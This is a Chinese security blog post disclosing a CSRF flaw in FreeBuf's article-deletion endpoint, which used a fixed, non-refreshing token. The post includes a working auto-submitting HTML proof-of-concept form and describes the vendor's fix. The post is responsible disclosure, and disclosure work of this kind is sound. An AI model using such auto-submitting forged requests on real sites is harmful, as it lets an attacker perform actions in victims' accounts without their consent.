“灯下黑”挖出国内知名安全平台某BUF的CSRF漏洞 – 作者:Litbaizhang

前言:上次偶然碰到了某BUF的xss漏洞,–>传送门,然后又是那么一次偶然的机会,发现了某BUF的csrf漏洞,这里就和大家分享一下

老样子先说漏洞再分析~

漏洞复现:

漏洞点在删除文章的地方,首先为了测试先发布一篇文章1620462275_60964ac37bb9eb1b0222d.png!small?1620462276900

发布之后我们可以查看文章,注意url中的一串数字,就是这篇文章的id,如下如:

1620462283_60964acb6f97c45c7060a.png!small?1620462285668这里的文章id是“271825”,首先抓一下删除文章的数据包:

1620462296_60964ad8657f77544905c.png!small?16204622974281620462299_60964adb075fb502b11e9.png!small?1620462303747

可以看到这里是验证了token的,不过看这个token,一开始我是笑出声的,转念一想这可能是配置错了吧,但是这样的话也就导致了这个csrf漏洞了。

直接使用burp自带的csrf测试插件生成测试POC:

1620462314_60964aeab497328d55174.png!small?16204623161941620462316_60964aec3cdbb3786f35c.png!small?1620462317117

上面抓的包先给DROP掉了,不然文章删掉还要再发一篇来测试。

为了测试的权威性,给POC中的form表单加个id,再加一句JS代码设置自动提交并且放到我的服务器上面,最终POC如下:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://my.freebuf.com/post/deleteArticle" method="POST" id="test">
<input type="hidden" name="id" value="271825" />
<input type="hidden" name="token" value="CSRF&#95;TOKEN" />
<input type="submit" value="Submit request" />
</form>
<script>
var form = document.getElementById('test');
form.submit();</script>
</body>
</html>

放到服务器的web服务上:

1620462863_60964d0f37e63cb907689.png!small?1620462863733

如果存在此漏洞的话,那么访问一下这个页面,这篇id为271825的文章就会被删除,访问之前再看一眼文章确实存在,还没有被删除,然后访问此页面之后,返回json信息如下:

1620462866_60964d12f1b724520dac7.png!small?1620462867505

再来看刚才的那片测试文章,此时已经没有了,主页也没有了:

1620462870_60964d163b8a7d9aafbf0.png!small?1620462870719

想到可以录个gif,但是文章已经删了,用一个之前的文章测试一下:

1620462874_60964d1aae3c87efac6bb.gif!small?1620462877743

到这里漏洞就复现完了,接下来是分析~

漏洞分析:

CSRF漏洞也就是客户端请求伪造漏洞,伪造用户发送请求来完成需要身份验证的操作,那么防护方法用的最多的最有效的也就是设置token来验证用户身份真实性。

现在的token验证一般有三种,新的token返回在表单中,新的token返回在set-cookie中,新的token返回在返回包的头中,原理基本相同,都是用户发送请求时携带token,然后服务端返回一个新的token,用户下次请求时携带的就是新的token了。

那么我们看一下某buf的这个数据包

1620462882_60964d22c4e242a349a32.png!small?1620462883289

token直接就是CSRF_TOKEN,而且返回包也没有返回新的TOKEN,也就不会刷新,固定的token我还是头一回见。

再看看其他地方的token:

1620462888_60964d28cfbd264c61184.png!small?1620462889493

1620462894_60964d2e2be7d1d8237ab.png!small?1620462894599

这里就是正常的一个流程,返回新的token,那么删除文章处的token可能就是配置错误了。

还有一点需要说的是,某BUF在这里是设置了Access-Control-Allow-Origin来做跨域限制的,不过经过测试发现,这里的限制并没有起到作用,在请求中就算没有Origin头也能正常的请求与响应,所以应该还是配置的问题了。

综合这两点:

一.token不刷新,返回的token还是固定的

二.跨域限制设置未生效

referer就不用说了,这样就导致了某BUF的CSRF漏洞!

反馈修复:

依旧是反馈,坐等修复~

1620462899_60964d336eb24a927c1c2.png!small?1620462900343

两个多小时才回复,可能是去验证漏洞了,过了两天再看删除文章的数据包,如下:

1620462904_60964d3800c03514cc8b5.png!small?1620462904663

对比之前的数据包,token已经不是固定的了,提交后会返回新的token,那么这个漏洞也就修复成功了!

总结:

某BUF漏洞二连,反馈修复的速度还是相当迅速的,牛的,完结,撒花~

来源:freebuf.com 2021-05-08 16:32:40 by: Litbaizhang

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论